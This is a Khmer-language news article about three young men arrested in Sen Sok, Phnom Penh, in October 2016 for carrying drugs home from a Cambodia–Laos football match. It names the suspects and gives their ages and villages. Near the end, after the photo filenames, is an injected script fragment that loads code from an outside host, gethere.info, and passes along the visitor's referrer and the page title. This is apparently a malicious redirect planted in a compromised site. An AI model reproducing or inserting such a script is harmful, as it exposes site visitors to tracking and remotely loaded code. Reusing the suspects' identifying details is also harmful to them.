Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ទៅមើលបាលទាត់ដាក់ថ្នាំញៀន៣កញ្ចប់តាមខ្លួនទុកប្រើប្រាស់ត្រូវសមត្ថកិច្ចសែនសុខឃាត់ខ្លួន

ភ្នំពេញ៖ យុវជន៣នាក់ត្រូវកម្លាំងសមត្ថកិច្ចខណ្ឌសែនសុខឃាត់ខ្លួន ករណីរក្សាទុកនូវសារធាតុញៀន ខុសច្បាប់ជាប់និងខ្លួន។ ការឃាត់ខ្លួននេះធ្វើឡើងនៅវេលាម៉ោង ៦ និង៤០នាទីល្ងាចថ្ងៃទី ១៥ តុលា ២០១៦ លើកំណាត់ផ្លូវសហព័ន្ធរុស្ស៊ី មុខវត្តទឹកថ្លា ភូមិចុងថ្នល់ខាងលិច សង្កាត់ទឹកថ្លា ខណ្ឌសែនសុខ។
ជនសង្ស័យទី១ មានឈ្មោះ គីន ប៊ុនហុង ភេទប្រុស អាយុ ២០ឆ្នាំ មុខរបរ កម្មកររោងចក្រ ស្នាក់នៅភូមិ បុរីកម្មករ ឃុំបែកចាន ស្រុកអង្គស្នួល ខេត្តកណ្តាល។
ទី២ ឈ្មោះ លី សេងហួរ ភេទប្រុស អាយុ២០ឆ្នាំ មុខរបរ កម្មកររោងចក្រ ស្នាក់នៅភូមិ បុរីកម្មករ ឃុំបែក ចាន ស្រុកអង្គស្នួល ខេត្តកណ្តាល។
ទី៣ ឈ្មោះ ជា រ៉ាវុធ ភេទប្រុស អាយុ ១៩ឆ្នាំ មុខរបរ មើលការខុសត្រូវកន្លែងស្តុកខ្សែកាបមួយកន្លែង ស្នាក់នៅ ភូមិកោះចិន ឃុំកោះចិន ស្រុកពញាឮ ខេត្តកណ្តាល។
ប្រភពអោយដឹងថា មុនពេលកើតហេតុ ជនសង្ស័យបានជិះម៉ូតូមួយគ្រឿងម៉ាក MSX ពណ៌ក្រហម អត់ស្លាកលេខ មានគ្នា៣នាក់ ក្នុងទិសដៅពីលិចទៅកើត ខណៈឃើញកំពុងជិះម៉ូតូ បានឃើញកម្លាំង សមត្ថកិច្ចចេញល្បាតតាមដងផ្លូវ ជនសង្ស័យម្នាក់បានហុចថ្នាំញៀនអោយទៅមិត្តភ័ក្តទុក ឃើញទិដ្ឋភាព ជាក់ស្តែងបែបនោះ សមត្ថកិច្ចបានហៅម៉ូតូអោយឈប់ និងធ្វើការត្រួតពិនិត្យ ក្នុងនោះឃើញមានក្រាម សថ្លា៤ កញ្ចប់ ប្រើរួចមួយកញ្ចប់ផងដែរ។ ក្រោយត្រួតពិនិត្យឃើញថា យុវជនខាងលើមានរក្សាទុកនូវ គ្រឿងញៀនខុសច្បាប់ សមត្ថកិច្ចក៍បាននាំខ្លួនមកកាន់ប៉ុស្តិ៍រដ្ឋបាលសង្កាត់ទឹកថ្លាដើម្បីសួរនាំ និងកសាង បញ្ជូនបន្តទៅកាន់អធិការនគរបាលខណ្ឌសែនសុខចាត់ការបន្តតាមនិតិវិធី។
នៅចំពោះមុខសមត្ថកិច្ច យុវជន ជា រ៉ាវុធ បានសារភាពថា ថ្នាំញៀនខាងលើខ្លួនបានយកចិញ្ជៀនមួយវង់ យកទៅដាក់ក្នុងតម្លៃ១០ម៉ឺន នៅចំនុចភូមិបុរីកម្មការ និងបានដាក់តាមខ្លួនទុកប្រើប្រាស់ ដោយថ្ងៃនេះ មានការប្រកួតបាល់ទាល់រវាងកម្ពុជា ឡាវ ខ្លួននិងមិត្តភ័ក្ត២នាក់ទៀត បាននាំគ្នាជិះម៉ូតូមួយគ្រឿង ទៅ ស្តាតអូឡាំពិក ខណៈវិលមកវិញបានពាក់កណ្តាលផ្លូវស្រាប់តែសមត្ថកិច្ចឃាត់ខ្លូនតែម្តង។

img_9395 img_9396 img_9401 img_9402 img_9404 img_9406 img_9410

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More